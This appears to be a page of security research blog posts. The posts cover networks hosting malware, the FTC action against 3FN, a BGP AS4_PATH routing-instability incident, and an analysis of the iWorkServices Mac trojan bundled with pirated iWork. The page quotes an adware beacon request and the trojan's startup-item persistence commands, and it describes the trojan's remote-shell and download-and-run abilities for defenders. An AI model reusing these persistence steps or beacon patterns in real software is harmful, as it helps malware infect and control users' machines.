AS4134, ChinaNet Backbone. Lots of malcode hosted here that we see, and the network is a victim of its own success. Downloaders, infostealers, etc. Been seeing a lot of downloaders phoning back here that install dozens (!) of pieces of malware in one shot all hosted on the same host. 311 (1.28%)

AS13678, Peer 1 Network. A lot of search hijack and toolbars associated with this IP. A lot of “hxxp://” in our database where we see stuff like this posted:

POST /tba/p HTTP/1.1
Content-Length: 269
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;; Windows NT 5.1)
Accept-Encoding: gzip
Host: ads.netbios-local.com
guid=2923514082588C8C84CB8C4B77FE87C3334E&version=86442206692A&clientid=696CD7897DEF73884430&time=AE5E7DD0AE33F9&idle=925089&locale=F94122913C22&session=B10B&activeWindows=E17B02&ticksBoot=AB363FD944633BEE&ticksAlive=336CA641989A53&installTime=0F0C26&launchCount=9E3962 647 (2.67%)

AS6939, Hurricane Electric. Lots of Swizzor related activity. 400 (1.65%)

AS3356, Level 3. Lots of FakeAV associated with this IP, such as this sample. 247 (1.02%)

AS23393, ISPrime. Seems to be associated with “Fake Alert” or “Renos” based on some Google searches and VTotal results for some samples. 281 (1.16%/1.16%)

Associated with Cutwail botnet activity, porn, and even Koobface activity. Spread over a few providers, but lumped into this /14. 293 (1.21%)

Coincident with above, hosted in AS16265 LEASEWEB. Fake Alerts and such … 244 (1.01%/1.01%) and 438 (1.81%/1.81%)

Associated with AS4134, ChinaNet Backbone. Lots of malware in this space from random individuals. 328 (1.35%/2.41%)

AS12695, Digital Network JSC. Lots of malware in the family of Alureon associate with URLs in this small netblock. 273 (1.13%)

AS3356, Level 3. Looks similar to what we’re seeing on the IP above. 286 (1.18%)

AS20228, Pacnet, S.A. de C.V. Lots of random malware, appears to be a free hosting provider in South America that kids are abusing. 305 (1.26%)

AS7796, ATMLink. More Renos and Fake Alert stuff associated with the malware we’re analyzing phoning back here. 251 (1.04%/1.04%)

AS4766, Korea Telecom. Lots of KwSearchGuide Adware associated with this netblock. Lots of EXEs, DLLs, and PHP scripts called here.

Things in 3FN

By: Jose -

I think by this time folks know about the FTC action against 3FN (Triple Fiber Network). Here’s some of the stuff we had tracked there over the years.


Don’t expect spam to drop to record lows any time soon, but … well done by the FTC.

More AS4_PATH Triggered Global Routing Instability

By: Danny McPherson -

For those of you not paying attention, a slew of new instabilities in the global routing system are occurring – again.  These are presumably being tickled by another ugly AS4_PATH tunnel bug where someone [read: broken implementation] erroneously includes AS_CONFED_* segments in an AS4_PATH attribute – a transitive optional BGP attribute that’s essentially ‘tunneled’ between non-4-octet-AS-number speaking autonomous systems.

BGP Routing Instability - Update Frequencies

BGP Routing Instability - Update Frequencies - GMT -5

The problem is that when it’s unencapsulated at the receiving end, by a BGP router that could be several networks away, those AS_CONFED_* attributes aren’t supposed to be there, and can result in either a reset of the local session with the adjacent external BGP speaker from which the update was received, or may be propagated to an internal BGP peer, which will likely drop the session with the transmitting speaker — neither of which stop the problem at the source.  The prefix that appears to be causing all the fuss appears to be, a copy of the suspect update [courtesy of ras] available here.  Ras’s email provides some insight into what he’s seeing at the moment, it’s available in the juniper-nsp archive, linked below, and currently unavailable.

The relevant protocol specifications error handling procedures were rather vague in this area until recently.  There have been a couple drafts submitted to the IETF Inter-Domain Routing (IDR) WG that attempt to address the specific case outlined above, as well as more generically that of optional transitive attributes and error handling.   One of the drafts is an update to the original BGP Support for Four-octet AS Number Space specification, RFC 4893, with more explicit guidance and an expanded error handling procedures section.   Another draft, Error Handling for Optional Transitive BGP Attributes, attempts to be more prescriptive in general, and addresses a few specific issues in existing specifications as well.

Some more information on the original problem from Rob Shakir and others on the IDR mailing list can be found here and in nested references.  I first heard about this specific incident through an email from Richard A Steenbergen ‘ras‘ on the Juniper NSP mailing list, about one hour after the incident began.  Coincidentally, the web interface for the Juniper NSP mailing list seems to be having some reachability problems at the moment that may actually be related to this specific issue.  Some earlier text on the previous incident, as well as a related problem, are available in an earlier post on our blog here.

It is worth noting that the amount of instability resulting from this seems to be significant, but not catastrophic at this point – although that’s likely something that is very topologically depedent, and may very well not be the case for a few less fortunate folk.  Finally, this incident is still evolving, it’s being going on for about 4 hours now.  Let’s hope it’s squelched soon, and if any noteworthy updates emerge, I’ll be sure to provide updates here accordingly.

iWorkServices == P2P iBotnet

By: Jose -

If you want iWork 09 and didn’t want to pay for it, you may have grabbed a pirated copy. That may not have been all you got. If you wanted your Mac to be a part of a P2P botnet, then you’re in luck!

It turns out the package you may have downloaded over BitTorrent, a massive 450MB ZIP installer, is really just a huge Trojan horse package that installs a simple P2P bot tool on your box. Running the installer will not install iLife but instead the official sounding “iWorkServices”. This is not what you think it is. The binary has these characteristics:

MD5 (iWorkServices) = 046af36454af538fa024fbdbaf582a49
SHA1(iWorkServices)= 55d754b95ab9b34bdd848300045c3e11caf67ecf
SHA(iWorkServices)= 6b83df2636a4813ef722f3fad7c65b5419044889
file size: 413568 bytes
iWorkServices: Mach-O universal binary with 2 architectures
iWorkServices (for architecture ppc):   Mach-O executable ppc
iWorkServices (for architecture i386):  Mach-O executable i386

When run as root it creats a couple of files and directories to get set up:


This will now run whenever your box boots. The installer makes sure that the script is runnable:

chmod 755 /System/Library/StartupItems/iWorkServices/iWorkServices

And the script just launches the binary:

/usr/bin/iWorkServices &

Not very sophisticated. On startup it creates a “dot” directory under /tmp:


It fires up some connections:

It will keep on trying until it connects. It also grabs a list of seed P2P peers from the file itself by decrypting the running file (thwarting static analysis) and managing the known peers as you would expect. It generates a port to listen on as needed (although it’s not quite clear to me how it would handle being behind a NAT device).

The bot software itself appears to be a Kadima-related P2P protocol with the expected commands to manage the peer list, but also to provide a remote shell, download and run arbitrary code, and to give full access to the box:


What’s more is that there is an embedded Lua interpreter, giving a very sophisticated command language some additional structure.

So, what’s this botnet been up to? DDoS it seems, via a downloaded and executed PHP script. Clever.

Looking to find if anyone else is monitoring this botnet …

Bear in mind that this is just like all of the other OS X malware: you have to willingly install it. It’s much more of a Trojan Horse than a virus or worm.

Related info:

Edited to fix the name of the product this Trojan package masqueraded as.

Go Back In Time →